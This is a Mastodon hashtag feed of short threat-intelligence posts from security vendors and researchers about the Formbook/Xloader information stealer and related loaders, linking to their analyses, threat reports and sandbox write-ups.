Mastodawn

📢 Xloader v8.1+ : nouvelles techniques d'obfuscation et protocole C2 détaillés
📝 ## 🔍 Contexte

Publié le 31 mars 2026 par ThreatLabz (Zscaler), cet article constitue une analyse technique approf...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-05-xloader-v8-1-nouvelles-techniques-d-obfuscation-et-protocole-c2-detailles/
🌐 source : https://www.zscaler.com/blogs/security-research/latest-xloader-obfuscation-methods-and-network-protocol
#C2_protocol #FormBook #Cyberveille

OTX Bot 3d ago

Latest Xloader Obfuscation Methods and Network Protocol

Xloader is an information stealing malware family that evolved from Formbook and targets web browsers, email clients, and File Transfer Protocol (FTP) applications. Additionally, Xloader may execute arbitrary commands and download second-stage payloads on an infected system. The author of Xloader continues to update the codebase, with the most recent observed version being 8.7. Since version 8.1, the Xloader developer applied several changes to the code obfuscation. The purpose of this blog is to describe the latest obfuscation methods and provide an in-depth analysis of the network communication protocol. We highly recommend reading our previous blogs about Xloader in order to get a better understanding of the malware’s internals.

Pulse ID: 69cd1af8a479e588f60bb052
Pulse Link: https://otx.alienvault.com/pulse/69cd1af8a479e588f60bb052
Pulse Author: AlienVault
Created: 2026-04-01 13:17:44

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #Email #FormBook #InfoSec #Malware #OTX #OpenThreatExchange #XLoader #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

ESET Research Jan 6

In H2 2025, #ESETresearch saw a thirtyfold increase in #CloudEyE detections, amounting to more than 100,000 hits over the course of six months. CloudEyE is a #MaaS downloader and cryptor used to conceal and deploy other malware, such as #Rescoms, #Formbook, and #Agent Tesla.
CloudEyE’s intital stage is a downloader that spreads via #PowerShell scripts, #JavaScript files, and #NSIS executables . These download the next stage – the cryptor component – with the final payload packed within. All of the CloudEyE stages are heavily obfuscated.
Most of CloudEyE attack attempts we registered in H2 2025 targeted Poland (32%). These attacks were part of a wave of email campaigns in Central and Eastern Europe ESET observed in September and October 2025.
In order to appear legitimate, the emails deployed in the campaign were often sent from compromised legitimate accounts and localized to the language of the targeted country. They were usually inquiries about invoice payments, package tracking, and purchase orders.
For further information on CloudEyE, cryptors, and more, head on over to the latest #ESETThreatReport: https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h22025.pdf

ransomNews Nov 18

🚨 FormBook malware spreads via fake installers A new FormBook wave uses weaponized PDFs and spoofed software installers to steal passwords, browser data, keystrokes and screenshots while dropping secondary payloads. Targets include small firms and home users. #ransomNews #FormBook #malware

LynxIntel Sep 22, 2025

🚨 Cyberattaque intercontinentale avec Formbook : ComicForm et SectorJ149 ciblent entreprises industrielles et financières depuis avril 2025. Phishing sophistiqué, obfuscation et extraction de données sensibles. Protégez-vous avec formation, EDR et segmentation réseau. #Cybersécurité #Formbook #Cyberattaque #LynxIntel https://lynxintel.io/cyberattaque-intercontinentale-avec-formbook-les-groupes-en-pleine-action/

Brad Aug 12, 2025

2025-08-11 (Monday): Quick post of an #XLoader ( #Formbook ) infection, with a #pcap, email, and #malware sample available at https://www.malware-traffic-analysis.net/2025/08/11/index.html

ANY.RUN Aug 7, 2025

🎯 Registry abuse helps #malware maintain persistence on infected endpoints. By detonating files in #ANYRUN Sandbox, analysts gain instant threat visibility to accelerate investigations and response.

👨‍💻 See #FormBook and script-based attacks analysis: https://any.run/cybersecurity-blog/how-to-spot-malware-registry-abuse/?utm_source=mastodon&utm_medium=post&utm_campaign=registry_abuse&utm_term=070825&utm_content=linktoblog

#cybersecurity #infosec

ANY.RUN Jun 30, 2025

Top 10 last week's threats by uploads 🌐
⬆️ #Lumma 548 (484)
⬇️ #Neconyd 289 (311)
⬇️ #Asyncrat 244 (300)
⬇️ #Snake 237 (262)
⬇️ #Remcos 190 (468)
⬇️ #Xworm 179 (214)
⬇️ #Agenttesla 168 (174)
⬆️ #Lokibot 154 (145)
⬇️ #Amadey 144 (157)
⬇️ #Formbook 128 (139)
Track them all: https://any.run/malware-trends/?utm_source=mastodon&utm_medium=post&utm_campaign=top_ten&utm_content=tracker&utm_term=300625

ANY.RUN Jun 24, 2025

🎯 Registry abuse helps #malware maintain persistence and stealth on infected endpoints.
Detonating suspicious files in #ANYRUN Sandbox gives instant visibility into registry activity.

Explore examples, featuring #FormBook and script-based attacks 👇
https://any.run/cybersecurity-blog/how-to-spot-malware-registry-abuse/?utm_source=mastodon&utm_medium=post&utm_campaign=spot_registry_abuse&utm_term=240625&utm_content=linktoblog

#cybersecurity #infosec